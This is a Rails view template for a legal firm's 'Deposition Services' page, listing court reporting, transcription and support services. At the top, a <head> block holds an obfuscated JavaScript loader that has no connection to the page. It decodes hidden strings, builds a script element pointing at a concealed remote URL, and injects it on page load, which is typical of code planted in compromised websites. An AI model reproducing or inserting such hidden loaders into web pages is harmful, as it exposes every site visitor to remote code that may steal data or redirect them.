<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "deposition_services.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h2 class="heading-decorated heading-decorated_center">Deposition Services</h2>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <h6>Empire Discovery’s Deposition Support team is built to provide world-class services and solutions for our clients. We maintain an elite staff of expert court reporters and case management specialists well-versed in handling complex litigations, specific subject matters, and all types of legal proceedings.</h6>
          <br>
          <p class="heading-5">Court Reporting:</p>
          <ul class="list-marked">
            <li><h6>Daily and Expedited Transcripts</h6></li>
            <li><h6>Keyword Indexing</h6></li>
            <li><h6>Realtime Transcription</h6></li>
            <li><h6>Condensed Transcripts ( Mini-Transcripts )</h6></li>
            <li><h6>ASCII CD</h6></li>
            <li><h6>Scheduling of Interpreters and Videographers</h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="bg-accent-2 py-5">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <p class="heading-5">Support Services:</p>
          <ul class="list-marked">
            <li><h6>Deposition Suites</h6></li>
            <li><h6>Telephone Depositions</h6></li>
            <li><h6>Delivery by email in multiple formats (eTranscripts, PDF, ASCII)</h6></li>
            <li><h6>Archiving of Transcripts</h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>

<section class="section-lg bg-default">
  <div class="container">
    <div class="row row-50 justify-content-xl-center">
      <div class="col-lg-10 col-xl-8">
        <article class="post-wide">
          <p class="heading-5">Transcription Services:</p>
          <h6>Our typists are capable of producing certified, accurate transcripts from all audio sources including:</h6>
          <ul class="list-marked">
            <li><h6>Audio Tapes/CDs (all sizes)</h6></li>
            <li><h6>All Court Audio Proceedings</h6></li>
            <li><h6>Recorded Arbitrations</h6></li>
            <li><h6>Personal Audio Files</h6></li>
          </ul>
        </article>
      </div>
    </div>
  </div>
</section>
